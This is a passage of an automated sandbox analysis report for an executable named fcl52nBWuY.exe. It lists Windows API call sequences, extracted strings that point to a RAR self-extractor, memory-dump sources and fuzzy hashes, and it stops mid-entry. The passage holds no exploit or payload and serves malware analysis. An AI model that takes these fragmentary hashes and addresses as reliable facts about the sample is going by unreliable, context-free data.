    • Opcode Fuzzy Hash: c81459ab4b61de4797d11716e35fd6ecee766371275467becb56b20ae7b96200
    • Instruction Fuzzy Hash: 6201D432A0D7116EF6A42B787C86A6B2A8BFF01775F300329F920B50E5EF165D0457C0
    APIs
    • GetLastError.KERNEL32(?,00083070,00065972,00083070,?,?,00065271,00000050,?,00083070,00000200), ref: 0006A509
    • _free.LIBCMT ref: 0006A53C
    • _free.LIBCMT ref: 0006A564
    • SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A571
    • SetLastError.KERNEL32(00000000,?,00083070,00000200), ref: 0006A57D
    • _abort.LIBCMT ref: 0006A583
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ErrorLast$_free$_abort
    • String ID:
    • API String ID: 3160817290-0
    • Opcode ID: d0e9fac7a3144f60ef04bd4c67469cdd25063df30beeaf14a72a55d21a85e307
    • Instruction ID: e271135ee2a0cc922e0194deb9bdcf9c6447ac888d018b0ab97f3ad50d758bf3
    • Opcode Fuzzy Hash: d0e9fac7a3144f60ef04bd4c67469cdd25063df30beeaf14a72a55d21a85e307
    • Instruction Fuzzy Hash: C7F0F432B44901A7E251B3346C0AFAF1A97ABC3721B250014F61AB21A3EF39C9418D66
    APIs
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005ED87
    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0005EDA1
    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0005EDB2
    • TranslateMessage.USER32(?), ref: 0005EDBC
    • DispatchMessageW.USER32(?), ref: 0005EDC6
    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0005EDD1
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
    • String ID:
    • API String ID: 2148572870-0
    • Opcode ID: 7cee77267b4a2bbf9139fe0c9afdc10391480ce0ddeeeb07ec7255f34ee89da7
    • Instruction ID: a4c427f4f5353fe023d66fc77fc23ceab1a750ebb47aa4cefaf788dabbe3d222
    • Opcode Fuzzy Hash: 7cee77267b4a2bbf9139fe0c9afdc10391480ce0ddeeeb07ec7255f34ee89da7
    • Instruction Fuzzy Hash: 42F0C972A01629AADA206BA5DC4DDDB7E7DEF42792B108421BA0AE2051D6389545C6E0
    APIs
      • Part of subcall function 0005B699: GetDC.USER32(00000000), ref: 0005B69D
      • Part of subcall function 0005B699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0005B6A8
      • Part of subcall function 0005B699: ReleaseDC.USER32(00000000,00000000), ref: 0005B6B3
    • GetObjectW.GDI32(?,00000018,?), ref: 0005B83C
      • Part of subcall function 0005BACE: GetDC.USER32(00000000), ref: 0005BAD7
      • Part of subcall function 0005BACE: GetObjectW.GDI32(?,00000018,?), ref: 0005BB06
      • Part of subcall function 0005BACE: ReleaseDC.USER32(00000000,?), ref: 0005BB9E
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ObjectRelease$CapsDevice
    • String ID: ($Pzv
    • API String ID: 1061551593-912823558
    • Opcode ID: cf6bc10236025dde24a29f5fe89d52fe9a72f22dfd56a43087f54fff3b8d9fd3
    • Instruction ID: ff89665da66db70c804629757f9c17a301d7c41b745e7830045b33f6e426d5b7
    • Opcode Fuzzy Hash: cf6bc10236025dde24a29f5fe89d52fe9a72f22dfd56a43087f54fff3b8d9fd3
    • Instruction Fuzzy Hash: 7A91F271608740AFD621DF25C844E2BBBE8FFC9701F00491EF99AD7261DB75A846CB62
    APIs
      • Part of subcall function 00051900: _wcslen.LIBCMT ref: 00051906
      • Part of subcall function 0004CD5C: _wcsrchr.LIBVCRUNTIME ref: 0004CD73
    • _wcslen.LIBCMT ref: 0004D5A4
    • _wcslen.LIBCMT ref: 0004D5EC
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$_wcsrchr
    • String ID: .exe$.rar$.sfx
    • API String ID: 3513545583-31770016
    • Opcode ID: c3bc7ee2305fdfed3358af45c197e994acdfaf6fb78e05c3146882efbaceab3a
    • Instruction ID: fbf59a24e6530908f3a85991a91e696b8a9f0cb7852e0acaae1002ebfffe5561
    • Opcode Fuzzy Hash: c3bc7ee2305fdfed3358af45c197e994acdfaf6fb78e05c3146882efbaceab3a
    • Instruction Fuzzy Hash: 51414AA2900B1099C772AF348845ABF73F4EF55748B11492FFD869B182EB608D85C35D
    APIs
    • GetTempPathW.KERNEL32(00000800,?), ref: 0005DFD0
      • Part of subcall function 0004CAA0: _wcslen.LIBCMT ref: 0004CAA6
    • _swprintf.LIBCMT ref: 0005E004
      • Part of subcall function 00044A20: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00044A33
    • SetDlgItemTextW.USER32(?,00000066,00092892), ref: 0005E024
    • EndDialog.USER32(?,00000001), ref: 0005E131
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcslen
    • String ID: %s%s%u
    • API String ID: 110358324-1360425832
    • Opcode ID: 79a0e9f3ec20ce1e57114e859e5842c994c46b4b64043dc4ca7c26e67557129d
    • Instruction ID: 4602befa694db7da0cf7024e5b3777c3084dabbc44e1c76e09275e25dbf17ed3
    • Opcode Fuzzy Hash: 79a0e9f3ec20ce1e57114e859e5842c994c46b4b64043dc4ca7c26e67557129d
    • Instruction Fuzzy Hash: 1B416E75900658AAEF659B60CC45FFF77ECEB04306F4080A6FE49A7051EF749A888F60
    APIs
    • _wcslen.LIBCMT ref: 0004CF56
    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0004B505,?,?,00000800,?,?,0004B4CA,?), ref: 0004CFF4
    • _wcslen.LIBCMT ref: 0004D06A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: _wcslen$CurrentDirectory
    • String ID: UNC$\\?\
    • API String ID: 3341907918-253988292
    • Opcode ID: 5c606486565e67c1d2933aaedb7d7de689e4dd547254ce997945317652dbdc3f
    • Instruction ID: a7190424b2882d4e2fabf044cf0c5262110141bb6d2331f03ca3698324cd75ae
    • Opcode Fuzzy Hash: 5c606486565e67c1d2933aaedb7d7de689e4dd547254ce997945317652dbdc3f
    • Instruction Fuzzy Hash: 0B41E3B1440219BADF60AF60CC01FEF73A9AF05391F144037FD58E7142E774A9468A99
    APIs
    • LoadBitmapW.USER32(00000065), ref: 0005C8CD
    • GetObjectW.GDI32(00000000,00000018,?), ref: 0005C8F2
    • DeleteObject.GDI32(00000000), ref: 0005C924
    • DeleteObject.GDI32(00000000), ref: 0005C947
      • Part of subcall function 0005B6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0005C91D,00000066), ref: 0005B6D5
      • Part of subcall function 0005B6C2: SizeofResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B6EC
      • Part of subcall function 0005B6C2: LoadResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B703
      • Part of subcall function 0005B6C2: LockResource.KERNEL32(00000000,?,?,?,0005C91D,00000066), ref: 0005B712
      • Part of subcall function 0005B6C2: GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,?,0005C91D,00000066), ref: 0005B72D
      • Part of subcall function 0005B6C2: GlobalLock.KERNEL32(00000000), ref: 0005B73E
      • Part of subcall function 0005B6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0005B762
      • Part of subcall function 0005B6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0005B7A7
      • Part of subcall function 0005B6C2: GlobalUnlock.KERNEL32(00000000), ref: 0005B7C6
      • Part of subcall function 0005B6C2: GlobalFree.KERNEL32(00000000), ref: 0005B7CD
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
    • String ID: ]
    • API String ID: 1797374341-3352871620
    • Opcode ID: c97a98f01981223de7ee8829ad304a331f7ceae87834e565261ca9d4a377e1d3
    • Instruction ID: 4b694782730cc00f6158b5782e5524236928e3fa48264623b1fc8477edfaf392
    • Opcode Fuzzy Hash: c97a98f01981223de7ee8829ad304a331f7ceae87834e565261ca9d4a377e1d3
    • Instruction Fuzzy Hash: 9E01D236500B057BE71277649C09EBF3ABAAF82B63F180014FD40B7292EF659C0D86A0
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005E78B
    • GetDlgItemTextW.USER32(?,00000068,00000800), ref: 0005E7A1
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005E7B5
    • SetDlgItemTextW.USER32(?,00000068), ref: 0005E7C4
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.1454482006.0000000000041000.00000020.00000001.01000000.00000003.sdmp, Offset: 00040000, based on PE: true
    • Associated: 00000000.00000002.1454461565.0000000000040000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454523666.0000000000074000.00000002.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000080000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000083000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.0000000000085000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454547792.00000000000A4000.00000004.00000001.01000000.00000003.sdmp
    • Associated: 00000000.00000002.1454633259.00000000000A5000.00000002.00000001.01000000.00000003.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_40000_fcl52nBWuY.jbxd
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: RENAMEDLG
    • API String ID: 364370097-3299779563
    • Opcode ID: d3e7cf2972828dd2e5b7a90653f27ab83fd8cdf21b4ef230cb67599566720945
    • Instruction ID: 58b6aaa36ced6e5f2c4f351418f90a08dac7ab757cf75ec77f86882d47c9538c
    • Opcode Fuzzy Hash: d3e7cf2972828dd2e5b7a90653f27ab83fd8cdf21b4ef230cb67599566720945
    • Instruction Fuzzy Hash: 3F012832688A587AF2244B64DC09FAB379DFB5EB03F100010F782A60D0C6A65A098B69
    APIs
    • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,000691D6,00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002), ref: 00069245
    • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00069258
    • FreeLibrary.KERNEL32(00000000,?,?,?,000691D6,00000000,?,00069176,00000000,0007D570,0000000C,000692CD,00000000,00000002), ref: 0006927B
    Strings
    Similarity
    • API ID: AddressFreeHandleLibraryModuleProc
    • String ID: CorExitProcess$mscoree.dll
    • API String ID: 4061214504-1276376045
    • Opcode ID: f38b97ae92ab8e62feaf2611d9ac9b761b5210a0565b324c337878bdc4c143a9
    • Instruction ID: 32753cd5b627af02ed960c3c7187b66684a73a743802a88c85fd97a6a8bbecba
    • Opcode Fuzzy Hash: f38b97ae92ab8e62feaf2611d9ac9b761b5210a0565b324c337878bdc4c143a9
    • Instruction Fuzzy Hash: 14F0AF30E00208BBEF519BA0DC19BAEBFB9EF04711F004164F909B6161CB785E81CA90
    APIs
      • Part of subcall function 00051B34: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00051B4F
      • Part of subcall function 00051B34: LoadLibraryW.KERNEL32(?,?,?,?,00000800,?,00050633,Crypt32.dll,00000000,000506AD,00000200,?,00050690,00000000,00000000,?), ref: 00051B71
    • GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 0005063F
    • GetProcAddress.KERNEL32(0008A1F0,CryptUnprotectMemory), ref: 0005064F
    Strings
    Similarity
    • API ID: AddressProc$DirectoryLibraryLoadSystem
    • String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
    • API String ID: 2141747552-1753850145
    • Opcode ID: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
    • Instruction ID: 5783d7cf3ed9597c72d2f5fcc8ddbcbc4ca139f06458d705d32556b6d6c25a98
    • Opcode Fuzzy Hash: 73478c8ee7a63faf1e9537bb9ff572a903c9811a0a6b8e2a3400a1bb4dcde05a
    • Instruction Fuzzy Hash: 9CE04F70C457819EE7605F749808B477FD45B14712B00C81DA79DA7552D7BCD8848B54
    APIs
    Similarity
    • API ID: AdjustPointer$_abort
    • String ID:
    • API String ID: 2252061734-0
    • Opcode ID: 1dbed777fc27ab3f91d0b9d2fdcaaf8a7bde63c43c45444f72bd31743ce2837e
    • Instruction ID: f131a93c284a5981de4300ddfa0ae984a758775b9a43ad1b7e8e858dba3e2791
    • Opcode Fuzzy Hash: 1dbed777fc27ab3f91d0b9d2fdcaaf8a7bde63c43c45444f72bd31743ce2837e
    • Instruction Fuzzy Hash: 4F51E671A05206AFDB698F54D841BBA77E7EF50310F14452DE905872D2E732EE80CBE0
    APIs
    • GetEnvironmentStringsW.KERNEL32 ref: 0006D0E9
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0006D10C
      • Part of subcall function 0006A7EE: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0006DBDC,00000000,?,000680A1,?,00000008,?,0006A861,?,?,?), ref: 0006A820
    • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 0006D132
    • _free.LIBCMT ref: 0006D145
    • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0006D154
    Similarity
    • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
    • String ID:
    • API String ID: 336800556-0
    • Opcode ID: 8e6eaf3f8cc5ec6a2219c37c00e549be72176006de67531a09e533b3380ab0ac
    • Instruction ID: 541630246a1d330ae3acfaf8da3305d0c1063c6f6d287000083dc0f1c10198bd
    • Opcode Fuzzy Hash: 8e6eaf3f8cc5ec6a2219c37c00e549be72176006de67531a09e533b3380ab0ac
    • Instruction Fuzzy Hash: CB017572F012157F373126B66C48C7B6AAEEFC7BA1314012AB908DA201DBA48C418170
    APIs
    • GetLastError.KERNEL32(?,00083070,00000200,0006A7E0,00067586,?,?,?,?,0004ECA4,?,03222240,00000064,00000004,0004EA30,?), ref: 0006A58E
    • _free.LIBCMT ref: 0006A5C3
    • _free.LIBCMT ref: 0006A5EA
    • SetLastError.KERNEL32(00000000,00074ADC,00000050,00083070), ref: 0006A5F7
    • SetLastError.KERNEL32(00000000,00074ADC,00000050,00083070), ref: 0006A600
    Similarity
    • API ID: ErrorLast$_free
    • String ID:
    • API String ID: 3170660625-0
    • Opcode ID: b93c938b3a9fa192a0e23205756658e2b9e74600d70c956e52f223ff39301897
    • Instruction ID: b45981702f745e035b3c41f5046e0d142b223f3cdee2cc3f44f95c5de59f8fb1
    • Opcode Fuzzy Hash: b93c938b3a9fa192a0e23205756658e2b9e74600d70c956e52f223ff39301897
    • Instruction Fuzzy Hash: 72012D32744A01ABE311B7746D45E6B219BEFC33703250018FA07F2153EF788D454D66
    APIs
    • _free.LIBCMT ref: 0006D9C7
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 0006D9D9
    • _free.LIBCMT ref: 0006D9EB
    • _free.LIBCMT ref: 0006D9FD
    • _free.LIBCMT ref: 0006DA0F
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
    • Instruction ID: b96a159f329df5c128572bd7d60945236b9962c0e6581550cf0d351b677d6408
    • Opcode Fuzzy Hash: 4779cb78c4f0597e8020061da7553de5984359de3cd6579292631da86ca501b3
    • Instruction Fuzzy Hash: E8F0FF72B08210ABD6A0EB68E986C5673EBBB157117580C07F48CE7501CB74FC808B75
    APIs
    • _wcslen.LIBCMT ref: 00053330
    • _wcslen.LIBCMT ref: 00053341
    • _wcslen.LIBCMT ref: 00053351
    • _wcslen.LIBCMT ref: 0005335F
    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0004C844,?,?,00000000,?,?,?), ref: 0005337A
    Similarity
    • API ID: _wcslen$CompareString
    • String ID:
    • API String ID: 3397213944-0
    • Opcode ID: 193496a7c3c3c91f4dc316ae512b5429fb251705ba239a267a59e4c230de39dd
    • Instruction ID: 2ccb029abfc66f66201ae6a530313ce9cf9b12d6f6674e1ef6aaf9349267bd00
    • Opcode Fuzzy Hash: 193496a7c3c3c91f4dc316ae512b5429fb251705ba239a267a59e4c230de39dd
    • Instruction Fuzzy Hash: 39F03A32108214BFCF222F51EC09DCE3F26EB48BB1B218425FA196E462CF32D695D6D0
    APIs
    • _free.LIBCMT ref: 00069CDE
      • Part of subcall function 0006A65A: RtlFreeHeap.NTDLL(00000000,00000000,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC), ref: 0006A670
      • Part of subcall function 0006A65A: GetLastError.KERNEL32(00074ADC,?,0006DA46,00074ADC,00000000,00074ADC,00000000,?,0006DA6D,00074ADC,00000007,00074ADC,?,0006DE6A,00074ADC,00074ADC), ref: 0006A682
    • _free.LIBCMT ref: 00069CF0
    • _free.LIBCMT ref: 00069D03
    • _free.LIBCMT ref: 00069D14
    • _free.LIBCMT ref: 00069D25
    Similarity
    • API ID: _free$ErrorFreeHeapLast
    • String ID:
    • API String ID: 776569668-0
    • Opcode ID: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
    • Instruction ID: 9b2779447b557187e7f1a541bac2bfff4237ef3f40a3fc398d5b0e6f0bffdad9
    • Opcode Fuzzy Hash: 7a45daa6592f280f78039bcb42b20fdfe704d4bbb47898899282d71ced973167
    • Instruction Fuzzy Hash: 94F08278D059208FE7417F14FC464493BE6F7A77313550606F11A63272C7BD08028F95
    APIs
    Strings
    Similarity
    • API ID: _swprintf
    • String ID: %ls$%s: %s
    • API String ID: 589789837-2259941744
    • Opcode ID: c48f8643084ea22cf7e6de5a41764b65dc2ceed50f749ee3a285804a7c5165bc
    • Instruction ID: 5a75b6fd942ffbc2da4f1f98b7196a49bef16ac61635cda999d7a2b417df982a
    • Opcode Fuzzy Hash: c48f8643084ea22cf7e6de5a41764b65dc2ceed50f749ee3a285804a7c5165bc
    • Instruction Fuzzy Hash: 9351E77168C301FEFA311A94CC02FBF7659AF17B03F204516BF8A645E6C7A26458A71B
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\fcl52nBWuY.exe,00000104), ref: 00069360
    • _free.LIBCMT ref: 0006942B
    • _free.LIBCMT ref: 00069435
    Strings
    Similarity
    • API ID: _free$FileModuleName
    • String ID: C:\Users\user\Desktop\fcl52nBWuY.exe
    • API String ID: 2506810119-289269042
    • Opcode ID: f92365274ac72f0c0bcee0dcf44c57361efa0e903382437a6841ef80c96e329e
    • Instruction ID: 3f85f2c8e2d3a8dc9c47c37a121df749a0a9296ce0415e32d9dd4aed6befdb46
    • Opcode Fuzzy Hash: f92365274ac72f0c0bcee0dcf44c57361efa0e903382437a6841ef80c96e329e
    • Instruction Fuzzy Hash: C831A071A04258EFDB21DF99DC81DAEBBFEEF86710F104066F50497612D7B08A41CB91
    APIs
    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0006437B
    • _abort.LIBCMT ref: 00064486
    Strings
    Similarity
    • API ID: EncodePointer_abort
    • String ID: MOC$RCC
    • API String ID: 948111806-2084237596
    • Opcode ID: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
    • Instruction ID: b555842112fb067234d7e31ab9851d6104fdaa825876cd63df26284fd5748e07
    • Opcode Fuzzy Hash: 7d735adfd9f728bc71450f0cdf4990f6c8a434d91782aa052623d69abd0df384
    • Instruction Fuzzy Hash: 0C414871900209AFCF15DF98CC82AEEBBB6BF49304F198159F904B7262D7359A51DB90
    APIs
    • __EH_prolog.LIBCMT ref: 00047F20
      • Part of subcall function 000442F1: __EH_prolog.LIBCMT ref: 000442F6
    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 00047FE5
      • Part of subcall function 00048704: GetCurrentProcess.KERNEL32(00000020,?), ref: 00048713
      • Part of subcall function 00048704: GetLastError.KERNEL32 ref: 00048759
      • Part of subcall function 00048704: CloseHandle.KERNEL32(?), ref: 00048768
    Strings
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: 2e4f8edb58c82f6cffa5f11aaae7d31c113bf91ac4a46b307470d751eff2506c
    • Instruction ID: 4569d4c7ac26d901d343bd08d5ddde0b58afd2f3bc1774e6ac2af3b527138835
    • Opcode Fuzzy Hash: 2e4f8edb58c82f6cffa5f11aaae7d31c113bf91ac4a46b307470d751eff2506c
    • Instruction Fuzzy Hash: D83105B1944248AEEFA0EB649C06FFE7BA9BF45714F008035F548E6192DB788D48CB65
    APIs
      • Part of subcall function 000412F6: GetParent.USER32(?), ref: 0004132A
      • Part of subcall function 000412F6: GetDlgItem.USER32(00000000,00003021), ref: 0004133A
      • Part of subcall function 000412F6: SetWindowTextW.USER32(00000000,000745F4), ref: 00041350
    • EndDialog.USER32(?,00000001), ref: 0005BE58
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0005BE6D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0005BE82
    Strings
    Similarity
    • API ID: ItemText$DialogParentWindow
    • String ID: ASKNEXTVOL
    • API String ID: 364370097-3402441367
    • Opcode ID: 6415ce3fb8f3bd38826680655495f36a8f1e46af727c0082dfe546665623933b
    • Instruction ID: 59cc5ab435943b885d36bd4ea7d82a2c31e110c97aa9d45dfe72ede6a91e6db7
    • Opcode Fuzzy Hash: 6415ce3fb8f3bd38826680655495f36a8f1e46af727c0082dfe546665623933b
    • Instruction Fuzzy Hash: B811E932600A11BFE6219F68DC47FFB77A9FB4B702F080010FB40AB0A5C766AD169765
    APIs
    • __fprintf_l.LIBCMT ref: 0004EC74
    • _strncpy.LIBCMT ref: 0004ECBA
      • Part of subcall function 000530E5: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00083070,00000200,0004EC48,00000000,?,00000050,00083070), ref: 00053102
    Strings
    Similarity
    • API ID: ByteCharMultiWide__fprintf_l_strncpy
    • String ID: $%s$@%s
    • API String ID: 562999700-834177443
    • Opcode ID: 8c35613135b6be00088328436bdfbd7e7e4ad7315ecec7d7fb86e364f6f1435d
    • Instruction ID: 5b24846763fbaf9273a65b2941f240a8ba3837325516342429f9b4bf5bb6a5a6
